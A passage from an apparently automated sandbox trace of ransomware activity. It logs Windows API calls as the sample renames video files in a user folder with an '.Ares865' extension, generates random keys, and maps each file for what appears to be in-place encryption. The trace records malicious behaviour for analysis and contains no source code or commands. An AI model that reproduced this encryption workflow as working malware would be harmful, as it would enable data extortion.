mg2.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\prnBaMQPrqP1JzZ mg2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\prnbamqprqp1jzz mg2.avi.ares865"), dwFlags=0x1) returned 1 [0091.842] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\prnBaMQPrqP1JzZ mg2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\prnbamqprqp1jzz mg2.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97760) returned 1 [0091.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.843] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.844] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.844] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.844] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x180e0, lpName=0x0) returned 0x15c [0091.844] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180e0) returned 0x190000 [0091.847] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.848] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.848] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.850] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\psF3WknRQug5HS_PF.swf.Ares865") returned 92 [0091.850] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\psF3WknRQug5HS_PF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\psf3wknrqug5hs_pf.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\psF3WknRQug5HS_PF.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\psf3wknrqug5hs_pf.swf.ares865"), dwFlags=0x1) returned 1 [0091.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\psF3WknRQug5HS_PF.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\psf3wknrqug5hs_pf.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.851] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73039) returned 1 [0091.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.851] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.852] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.852] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.852] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.852] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12050, lpName=0x0) returned 0x15c [0091.853] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12050) returned 0x190000 [0091.855] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.856] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.856] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.858] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\t1_UZ9rWL_E8Nn3eJy.mkv.Ares865") returned 93 [0091.858] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\t1_UZ9rWL_E8Nn3eJy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\t1_uz9rwl_e8nn3ejy.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\t1_UZ9rWL_E8Nn3eJy.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\t1_uz9rwl_e8nn3ejy.mkv.ares865"), dwFlags=0x1) returned 1 [0091.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\t1_UZ9rWL_E8Nn3eJy.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\t1_uz9rwl_e8nn3ejy.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.858] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82462) returned 1 [0091.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.859] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.859] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.859] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.860] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14520, lpName=0x0) returned 0x15c [0091.860] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14520) returned 0x190000 [0091.862] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.863] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.863] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.865] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\UYECNcV9PaWPO-G_qiS2.mp4.Ares865") returned 95 [0091.865] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\UYECNcV9PaWPO-G_qiS2.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\uyecncv9pawpo-g_qis2.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\UYECNcV9PaWPO-G_qiS2.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\uyecncv9pawpo-g_qis2.mp4.ares865"), dwFlags=0x1) returned 1 [0091.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\UYECNcV9PaWPO-G_qiS2.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\uyecncv9pawpo-g_qis2.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.866] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67748) returned 1 [0091.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.866] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.867] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.867] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.867] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10bb0, lpName=0x0) returned 0x15c [0091.867] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10bb0) returned 0x190000 [0091.869] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.870] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.870] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.872] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK" [0091.873] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\8i3kb8cVxORR7aFvoPjH.mkv.Ares865") returned 107 [0091.873] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\8i3kb8cVxORR7aFvoPjH.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\8i3kb8cvxorr7afvopjh.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\8i3kb8cVxORR7aFvoPjH.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\8i3kb8cvxorr7afvopjh.mkv.ares865"), dwFlags=0x1) returned 1 [0091.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\8i3kb8cVxORR7aFvoPjH.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\8i3kb8cvxorr7afvopjh.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.874] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23922) returned 1 [0091.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.874] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.875] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.875] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.875] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6080, lpName=0x0) returned 0x15c [0091.875] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6080) returned 0x190000 [0091.876] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.877] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.877] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\FrlOVYnQ8K5.mkv.Ares865") returned 98 [0091.879] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\FrlOVYnQ8K5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\frlovynq8k5.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\FrlOVYnQ8K5.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\frlovynq8k5.mkv.ares865"), dwFlags=0x1) returned 1 [0091.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\FrlOVYnQ8K5.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\frlovynq8k5.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=71846) returned 1 [0091.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.880] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.881] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.881] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.881] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11bb0, lpName=0x0) returned 0x15c [0091.881] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11bb0) returned 0x190000 [0091.883] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.884] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.884] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.884] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.886] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\QmP9K0RTv9w.mp4.Ares865") returned 98 [0091.886] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\QmP9K0RTv9w.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\qmp9k0rtv9w.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\QmP9K0RTv9w.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\qmp9k0rtv9w.mp4.ares865"), dwFlags=0x1) returned 1 [0091.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\QmP9K0RTv9w.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\qmp9k0rtv9w.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.887] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13534) returned 1 [0091.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.887] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.888] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.888] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.888] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.888] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x37e0, lpName=0x0) returned 0x15c [0091.888] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e0) returned 0x190000 [0091.889] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.890] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.890] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.890] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.891] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\Z-izuVRF CeO.mkv.Ares865") returned 99 [0091.891] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\Z-izuVRF CeO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\z-izuvrf ceo.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\Z-izuVRF CeO.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\z-izuvrf ceo.mkv.ares865"), dwFlags=0x1) returned 1 [0091.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\Z-izuVRF CeO.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\z-izuvrf ceo.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.892] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101588) returned 1 [0091.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.893] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.893] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.893] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.894] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18fe0, lpName=0x0) returned 0x15c [0091.894] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18fe0) returned 0x190000 [0091.896] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.897] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.897] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.898] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.898] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.898] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.898] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.899] CloseHandle (hObject=0x15c) returned 1 [0091.899] CloseHandle (hObject=0x118) returned 1 [0091.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.900] FindNextFileW (in: hFindFile=0x2ccde8, 